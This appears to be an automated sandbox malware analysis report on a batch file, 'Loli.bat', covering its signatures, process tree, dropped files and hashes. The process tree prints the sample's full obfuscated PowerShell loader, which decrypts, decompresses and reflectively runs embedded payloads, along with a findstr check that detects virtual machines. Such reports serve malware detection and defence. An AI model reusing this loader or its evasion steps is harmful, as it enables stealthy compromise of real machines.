Analysis

  • max time kernel
    90s
  • max time network
    65s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    02-01-2025 23:05

General

  • Target

    Loli.bat

  • Size

    7.2MB

  • MD5

    d266b84f245e8de76e05e762e3b7cfca

  • SHA1

    ed75a3413e35ff95bb01a4027f38e2a0e22e2cae

  • SHA256

    26a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad

  • SHA512

    b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f

  • SSDEEP

    49152:2Ispe9WTFYTG/p+hBJhMIZHEUaS9Yvg/mAi+v16h18WqW18EfCfKNHppku4O3v9y:h

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1048
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d0464dec-4aef-452a-8a45-d774f5c2f7e1}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3424
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:680
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:972
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:404
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:432
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:732
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1068
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1088
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1232
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1272
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3136
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1312
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                          1⤵
                            PID:1336
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1344
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1420
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1512
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2972
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:4008
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:1188
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:1460
                                        • C:\Windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:3896
                                          • C:\Windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:3132
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1548
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                              1⤵
                                                PID:1596
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1648
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                  1⤵
                                                    PID:1656
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1804
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
                                                        PID:1832
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:1940
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1948
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                            1⤵
                                                              PID:1960
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1968
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                1⤵
                                                                  PID:2052
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2160
                                                                • C:\Windows\System32\spoolsv.exe
                                                                  C:\Windows\System32\spoolsv.exe
                                                                  1⤵
                                                                    PID:2172
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    1⤵
                                                                      PID:2308
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                      1⤵
                                                                        PID:2472
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                        1⤵
                                                                          PID:2644
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                          1⤵
                                                                            PID:2652
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                            1⤵
                                                                            • Drops file in System32 directory
                                                                            PID:2764
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2812
                                                                            • C:\Windows\sysmon.exe
                                                                              C:\Windows\sysmon.exe
                                                                              1⤵
                                                                                PID:2828
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                1⤵
                                                                                  PID:2852
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                  1⤵
                                                                                    PID:2860
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:692
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                      1⤵
                                                                                        PID:1332
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                        1⤵
                                                                                          PID:3216
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                          1⤵
                                                                                            PID:3476
                                                                                          • C:\Windows\Explorer.EXE
                                                                                            C:\Windows\Explorer.EXE
                                                                                            1⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3524
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
                                                                                              2⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:388
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                3⤵
                                                                                                  PID:2540
                                                                                                • C:\Windows\system32\fsutil.exe
                                                                                                  fsutil fsinfo drives
                                                                                                  3⤵
                                                                                                    PID:456
                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                    findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                    3⤵
                                                                                                      PID:4180
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));
                                                                                                      3⤵
                                                                                                        PID:968
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell.exe -WindowStyle Hidden
                                                                                                        3⤵
                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Drops file in Windows directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3496
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                                          4⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          PID:1716
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                          4⤵
                                                                                                            PID:3892
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                      1⤵
                                                                                                        PID:3692
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3964
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4108
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:4332
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                              1⤵
                                                                                                                PID:1076
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                1⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1260
                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                1⤵
                                                                                                                  PID:1844
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:2896
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:2408
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                      1⤵
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:3076
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:1220
                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                        1⤵
                                                                                                                          PID:2900
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                          1⤵
                                                                                                                            PID:3936
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:4444
                                                                                                                            • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                              C:\Windows\System32\WaaSMedicAgent.exe 3610b350022ce25e1ea2d370d0e891a2 Y7XvqFC65EaOXdPJ1MfOdw.0.1.0.0.0
                                                                                                                              1⤵
                                                                                                                              • Sets service image path in registry
                                                                                                                              PID:3016
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                2⤵
                                                                                                                                  PID:3172
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                1⤵
                                                                                                                                  PID:4880
                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  PID:1604
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                  1⤵
                                                                                                                                    PID:3604
                                                                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:1908
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                      1⤵
                                                                                                                                        PID:4500
                                                                                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Enumerates system info in registry
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:412

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z04e3pfc.wbk.ps1

                                                                                                                                        Filesize

                                                                                                                                        60B

                                                                                                                                        MD5

                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                        SHA1

                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                        SHA256

                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                        SHA512

                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                      • C:\Windows\$rbx-onimai2\$rbx-CO2.bat

                                                                                                                                        Filesize

                                                                                                                                        7.2MB

                                                                                                                                        MD5

                                                                                                                                        d266b84f245e8de76e05e762e3b7cfca

                                                                                                                                        SHA1

                                                                                                                                        ed75a3413e35ff95bb01a4027f38e2a0e22e2cae

                                                                                                                                        SHA256

                                                                                                                                        26a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad

                                                                                                                                        SHA512

                                                                                                                                        b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        4838ee953dab2c7a1bf57e0c6620a79d

                                                                                                                                        SHA1

                                                                                                                                        8c39cd200f9ffa77739ff686036d0449984f1323

                                                                                                                                        SHA256

                                                                                                                                        22c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d

                                                                                                                                        SHA512

                                                                                                                                        066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        8e64ab95d5d2c4c1e7a757624cb1fffa

                                                                                                                                        SHA1

                                                                                                                                        9889f93ad60bacb07683b4a23c40aa32954646d8

                                                                                                                                        SHA256

                                                                                                                                        dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6

                                                                                                                                        SHA512

                                                                                                                                        3ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        c6086d02f8ce044f5fa07a98303dc7eb

                                                                                                                                        SHA1

                                                                                                                                        6116247e9d098b276b476c9f4c434f55d469129c

                                                                                                                                        SHA256

                                                                                                                                        8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

                                                                                                                                        SHA512

                                                                                                                                        1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                        Filesize

                                                                                                                                        3KB

                                                                                                                                        MD5

                                                                                                                                        39b9eb9d1a56bc1792c844c425bd1dec

                                                                                                                                        SHA1

                                                                                                                                        db5a91082fa14eeb6550cbc994d34ebd95341df9

                                                                                                                                        SHA256

                                                                                                                                        acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

                                                                                                                                        SHA512

                                                                                                                                        255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        4ac1741ceb19f5a983079b2c5f344f5d

                                                                                                                                        SHA1

                                                                                                                                        f1ebd93fbade2e035cd59e970787b8042cdd0f3b

                                                                                                                                        SHA256

                                                                                                                                        7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

                                                                                                                                        SHA512

                                                                                                                                        583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                                        SHA1

                                                                                                                                        1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                                        SHA256

                                                                                                                                        8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                                        SHA512

                                                                                                                                        537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                                      • memory/404-81-0x000001E099C90000-0x000001E099CBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-45-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-33-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-32-0x00000145F3E60000-0x00000145F3E84000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        144KB

                                                                                                                                      • memory/612-34-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-42-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-43-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-44-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/612-47-0x00007FFA1F30D000-0x00007FFA1F30E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/612-46-0x00000145F3E90000-0x00000145F3EBA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-58-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-50-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-55-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-56-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-57-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-59-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/680-61-0x00000258F2070000-0x00000258F209A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

